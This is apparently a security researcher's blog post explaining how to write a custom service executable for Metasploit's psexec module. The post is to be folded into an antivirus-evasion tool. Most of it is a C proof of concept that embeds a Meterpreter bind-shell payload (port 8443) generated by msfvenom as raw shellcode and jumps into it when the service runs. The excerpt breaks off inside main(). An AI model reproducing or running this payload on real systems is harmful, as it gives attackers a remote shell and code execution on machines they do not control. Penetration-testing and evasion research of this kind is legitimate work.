Write your own metasploit psexec service

govolution

Lately I have been doing some research on Metasploit's psexec module and how to write your own service executable. This will be integrated into AVET within the next few weeks.
The PoC is simple (download: https://github.com/govolution/avepoc/blob/master/psexecservice.c):

```c
// compile:
// wine gcc -m32 psexecservice.c
#include <windows.h>
#include <stdio.h>

#define SLEEP_TIME 5000
#define LOGFILE "C:\\status.txt"

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);
int InitService();

// some shellcode
//# msfvenom -p windows/meterpreter/bind_tcp lport=8443 -f c -a x86 --platform Windows
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a"
"\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x20\xfb\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75"
"\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
"\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04"
"\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b"
"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f"
"\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3";

// Jump straight into buf[]. buf lives in the .data section, so this only works
// if that section is executable for the process (no DEP on it).
void exec_shellcode(unsigned char *shellcode)
{
    int (*funct)();
    funct = (int (*)()) shellcode;
    (int)(*funct)();
}

// Append one line to LOGFILE; returns -1 if the file cannot be opened.
int WriteToLog(char* str)
{
    FILE* log;
    log = fopen(LOGFILE, "a+");
    if (log == NULL)
        return -1;
    fprintf(log, "%s\n", str);
    fclose(log);
    return 0;
}

int main()
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MemoryStatus";
    ServiceTable[0].lpServiceProc =…
    // (the excerpt is cut off here; the rest is in the original post)
```

View original post (472 more words)
